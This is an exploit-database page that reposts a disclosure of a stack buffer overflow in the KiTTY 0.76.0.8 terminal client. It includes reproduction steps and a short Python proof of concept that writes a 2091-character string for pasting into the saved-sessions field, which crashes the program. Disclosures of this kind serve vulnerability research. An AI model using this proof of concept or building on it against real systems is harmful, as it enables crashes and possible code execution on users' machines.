Kitty 0.76.0.8 Stack Buffer Overflow
CVE
Category
Price
Severity
CWE-120
Not disclosed
High
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2022-06-20
CPE
cpe:cpe:/a:kitty:0.76.0.8
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022060055 Below is a copy:
Kitty 0.76.0.8 Stack Buffer Overflow # Exploit Title: Kitty 0.76.0.8 Stack Buffer Overflow
# Discovered by: Yehia Elghaly
# Discovered Date: 2022-06-08
# Vendor Homepage: http://www.9bis.net/kitty/index.html#!index.md
# Software Link : https://www.fosshub.com/KiTTY.html?dwl=kitty_portable-0.76.0.8.exe
# Tested Version: 0.76.0.8
# Vulnerability Type: Buffer Overflow
# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
# Description: Kitty 0.76.0.8 Stack Buffer Overflow
# Steps to reproduce:
# 1. - Run the python script and it will create exploit.txt file.
# 3. - Kitty 0.76.0.8
# 4. - Sessions -> Save
# 5. - Paste the characters of txt to Saved/Sessions then click save
# 6. - Crashed
# Note: ECX Overwwrite
#!/usr/bin/python
exploit = 'A' * 2091
try:
file = open("exploit.txt","w")
file.write(exploit)
file.close()
print("POC is created")
except:
print("POC not created")
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum